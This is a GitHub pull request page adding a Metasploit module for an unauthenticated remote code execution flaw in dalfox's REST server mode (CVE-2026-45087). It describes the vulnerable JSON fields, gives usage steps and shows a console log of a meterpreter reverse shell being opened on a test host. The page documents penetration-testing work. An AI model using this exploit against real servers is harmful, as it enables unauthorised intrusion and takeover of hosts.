Skip to content

Add Dalfox Unauthenticated RCE module (CVE-2026-45087)#21493

Open
Takahiro-Yoko wants to merge 2 commits into
rapid7:masterfrom
Takahiro-Yoko:dalfox_server_rce_cve_2026_45087
Open

Add Dalfox Unauthenticated RCE module (CVE-2026-45087)#21493
Takahiro-Yoko wants to merge 2 commits into
rapid7:masterfrom
Takahiro-Yoko:dalfox_server_rce_cve_2026_45087

Conversation

@Takahiro-Yoko
Copy link
Copy Markdown
Contributor

@Takahiro-Yoko Takahiro-Yoko commented May 24, 2026

CVE-2026-45087

Vulnerable Application

When dalfox is started in REST API server mode (dalfox server), the server binds to 0.0.0.0:6664 by default and requires no API key unless the operator explicitly passes --api-key. Because model.Options — including FoundAction and FoundActionShell — is deserialized directly from attacker-supplied JSON in POST /scan, and because dalfox.Initialize explicitly propagates those two fields into the final scan options without stripping them, any unauthenticated caller who can reach the server port can supply an arbitrary shell command that the dalfox process will execute on the host whenever a scan finding is triggered.

The vulnerability affects:

* dalfox <= 2.12.0

This module was successfully tested on:

* dalfox 2.12.0 on Ubuntu 24.04

Installation

  1. go install github.com/hahwul/dalfox/v2@v2.12.0

  2. export PATH=$PATH:$(go env GOPATH)/bin

  3. dalfox server

Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: use exploit/linux/http/dalfox_server_rce_cve_2026_45087
  4. Do: run lhost=<lhost> rhost=<rhost>
  5. You should get a meterpreter

Scenarios

msf > use exploit/linux/http/dalfox_server_rce_cve_2026_45087
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(linux/http/dalfox_server_rce_cve_2026_45087) > run lhost=192.168.56.1 rhost=192.168.56.16
[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Dalfox detected.
[*] Using URL: http://192.168.56.1:8081/mcpYksL
[*] Server started.
[*] Sending stage (3090404 bytes) to 192.168.56.16
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:40642) at 2026-05-24 09:30:54 +0900
[*] Server stopped.

meterpreter > getuid
Server username: ubu
meterpreter > sysinfo
Computer     : vul
OS           : Ubuntu 24.04 (Linux 6.8.0-56-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

@bwatters-r7 bwatters-r7 self-assigned this May 28, 2026
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

No reviews

Assignees

@bwatters-r7 bwatters-r7

Labels

docs module

Projects

Metasploit Kanban
Status: Todo

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

4 participants

@Takahiro-Yoko @h00die @bwatters-r7 @smcintyre-r7